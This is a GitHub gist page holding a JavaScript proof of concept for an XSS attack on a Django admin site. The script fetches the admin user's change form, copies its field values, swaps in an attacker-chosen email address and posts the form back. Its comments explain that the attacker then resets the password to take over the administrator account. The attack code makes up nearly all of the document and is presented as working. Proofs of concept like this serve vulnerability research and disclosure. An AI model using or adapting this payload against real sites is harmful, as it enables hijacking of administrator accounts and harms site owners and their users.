Skip to content

Instantly share code, notes, and snippets.

@gipi

gipi/poc.js

Created Feb 15, 2017
Embed
What would you like to do?
#poc #django #js #vulnerability
/*
* POC for XSS vulnerability
*
* Simply parse the change form for the admin user and change the email.
* The attacker needs, after this has run successful, to reset the password using
* the email indicated in the script.
*/
url = '/auth/user/1/change/'
url_reset_passwd = '/password_change/'
evil_email = 'dummy@example.com'
// get the values
function get_default(idx) {
$element = $(this);
attrname = $element.attr('name');
value = $element.val();
opts[attrname] = value;
console.log(attrname);
}
// get the editing page
response = $.ajax(url, {
success: function (data, testStatus, xhr){
pwn(data);
}
})
// this is called when the GET returns with success
function pwn(response) {
$response = $(response)
$form = $($response.find('form')[1])
console.log($form);
// fields for POSTing
opts = {}
// with a JQuery magic get the default value
$form.find('input').each(get_default)
// i'm twelve, what's this?
opts['email'] = evil_email;
console.log(opts)
// ??? profit
$.post(url, opts)
console.log(' [+] pwned')
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.